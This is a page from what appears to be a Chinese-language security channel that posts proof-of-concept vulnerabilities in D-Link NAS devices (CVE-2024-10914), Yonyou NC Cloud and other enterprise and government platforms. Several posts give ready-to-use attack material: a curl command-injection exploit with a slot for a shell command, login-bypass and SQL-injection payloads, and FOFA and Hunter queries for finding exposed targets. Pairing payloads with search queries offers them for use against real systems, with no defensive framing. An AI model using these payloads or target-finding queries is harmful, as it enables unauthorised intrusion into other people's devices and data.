Find similar content

@Cybersec_threat · Post #1406 · 11/08/2024, 01:30 PM

D-Link NAS 设备中发现了一个严重漏洞 CVE-2024-10914，对全球超过 61,000 个系统构成严重风险。该漏洞是 account_mgr.cgi 脚本中的命令注入漏洞，允许远程攻击者通过特制的 HTTP GET 请求执行任意命令 Exploit: curl "http://[Target-IP]/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;<INJECTED_SHELL_COMMAND>;%27" Affected Devices: DNS-320 – Version 1.00 DNS-320LW – Version 1.01.0914.2012 DNS-325 – Versions 1.01 and 1.02 DNS-340L – Version 1.08 Search query: FOFA: app="D_Link-DNS-ShareCenter" #poc

Hashtags

@Cybersec_threat · Post #1392 · 09/24/2024, 02:35 AM

泛微e-Mobile 移动管理平台/client/cdnfile存在任意文件读取漏洞 #poc

Hashtags

@Cybersec_threat · Post #1391 · 09/24/2024, 02:34 AM

H3C CAS fd前台任意文件上传漏洞 #poc

Hashtags

@Cybersec_threat · Post #1390 · 09/24/2024, 02:33 AM

数字通指尖云平台-智慧政务存在登录绕过漏洞 #poc

Hashtags

@Cybersec_threat · Post #1388 · 09/21/2024, 03:19 AM

天融信运维安全审计系统synRequest存在远程命令执行漏洞 #poc

Hashtags

@Cybersec_threat · Post #1375 · 09/01/2024, 02:17 AM

#poc

Hashtags

@Cybersec_threat · Post #1374 · 09/01/2024, 02:17 AM

#poc

Hashtags

@Cybersec_threat · Post #1369 · 08/30/2024, 04:27 AM

用友NC Cloud 0Day漏洞 Hunter指纹: web.icon=="a5dccf6af79f420f7ea2f2becb6fafa5" 登录绕过漏洞 Payload: mp/loginxietong?username=admin SQL注入漏洞 Payload: portal/pt/PaWfm/open?pageId=login&proDefPk=1* #poc

Hashtags

@Cybersec_threat · Post #1368 · 08/30/2024, 04:25 AM

#poc

Hashtags

@Cybersec_threat · Post #1367 · 08/30/2024, 04:25 AM